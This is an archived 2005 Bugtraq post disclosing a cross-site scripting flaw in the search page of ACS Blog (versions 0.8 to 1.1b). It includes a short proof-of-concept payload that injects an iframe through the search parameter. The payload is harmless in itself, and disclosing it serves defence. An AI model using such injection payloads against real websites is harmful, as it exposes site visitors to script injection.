Bugtraq mailing list archives
XSS in ACS blog
From: farhad koosha <farhadkey () yahoo com>
Date: 17 Mar 2005 08:24:01 -0000
XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ). Vulnerable : ACS Blog v 0.8 ACS Blog v 0.9 ACS Blog v 1.0 ACS Blog v 1.1b Code : /search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E or goto /search.asp and copy this code : "<br><iframe src="http://google.com"></iframe> Vendor URL : http://www.asppress.com
Current thread:
- XSS in ACS blog farhad koosha (Mar 17)